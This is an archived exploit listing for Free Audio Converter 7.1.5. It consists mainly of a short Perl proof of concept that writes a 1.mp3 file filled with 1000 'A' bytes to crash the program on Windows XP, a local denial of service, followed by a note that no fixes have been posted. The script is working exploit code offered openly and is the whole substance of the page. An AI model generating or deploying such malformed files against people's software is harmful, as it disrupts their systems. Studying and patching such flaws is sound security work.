Free Audio Converter 7.1.5 Denial of Service Vulnerability PoC

2010-12-04 09:16:35

####
####
####Exploit Title: Free Audio Converter 7.1.5 Local Crash PoC
####Software Link: http://www.free-audio-converter.net/
####Tested on: Win XP SP3
####Date: 04-12-2010
####Author: h1ch4m
####Email: [email protected]
####
####


#Note: all vendor's products are affected.
my $file= "1.mp3";
my $junk = "\x41" x 1000;
open($FILE,">$file");
print $FILE $junk;
close($FILE);
print "File Created successfully\n";
sleep(1);

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.